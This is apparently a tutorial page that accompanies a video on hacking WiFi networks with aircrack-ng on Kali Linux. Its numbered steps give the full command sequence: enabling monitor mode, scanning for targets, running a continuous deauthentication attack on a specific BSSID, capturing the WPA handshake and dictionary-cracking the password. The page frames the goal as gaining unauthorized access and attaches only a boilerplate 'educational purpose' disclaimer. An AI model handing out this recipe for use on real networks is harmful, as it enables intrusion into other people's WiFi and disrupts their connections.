Play Video about Kali Linux aircrack-ng Wifi Deauther attack

Kali Linux aircrack-ng Wifi Deauther attack

Table of Context

1. What is the use of aircrack-ng?

It is software which is use for analyzing and hacking WiFi networks. It is allow packet capture and export of data to text files using there monitoring mode feature. We are also use this tool for replay attacks, deauthentication, fake access points and more using pocket injection.

Disclaimer – This video is for educational purpose only. Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for “fair use” for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use. 

2. How to Hack WiFi Network using aircrack-ng?

To Hack a WiFi Network using Aircrack-ng Tool you have to follow these given steps:

  • First Install Aircrack-ng https://www.aircrack-ng.org , If you are using kali linux then it is already installed in your system
  • Open your root terminal (use sudo -i for root access)
  • Then First Update  Your System following this command. sudo apt-get update
  • After that check your wifi adapter or wifi card mode like managed or monitor
  • If mode is managed then you have to enable or change the mode to monitor with this following command airmon-ng check kill and airmon-ng start wlan0 (in your case wlan0 may be different) 
  • Now check monitor mode is enabled or not using this command iwconfig
  • Now you need a wordlist see sample like this click to download
  • Set the path in terminal like my wordlist file is on the Desktop so I use cd /home/kali/Desktop
  • Now check availabile or nearest wifi networks using this command airodump-ng wlan0mon
  • Use ctrl + c to terminate the process.
  • Now Perform Attack using this command airodump-ng wlan0mon -c 1 (It is indicates in CH) –bssid 52:01:B4:E4:79:FA -w (Enter the name of your file) ti and click enter
  • Now we have to perform deauth attack using other terminal with this command aireplay-ng –deauth 0 -a 52:01:B4:E4:79:FA wlan0mon
  • Now your System capture the handshake file and store in your file like in our case file name is ti-01.cap
  • Now last process is crack the encripted file using aircrack with this command aircrack-ng -w wordlist.txt ti-01.cap
  • Now you can successfully crack your password like this tiplus123
  • for more information watch video above 

3. Conclusion:

Using the Aircrack-ng tool, you can potentially gain unauthorized access to WiFi networks. However, it’s crucial to note that WiFi hacking is illegal. If you encounter any issues or have concerns regarding this information, please feel free to email us. technicalinteractofficial@gmail.com

guest
0 Comments
Inline Feedbacks
View all comments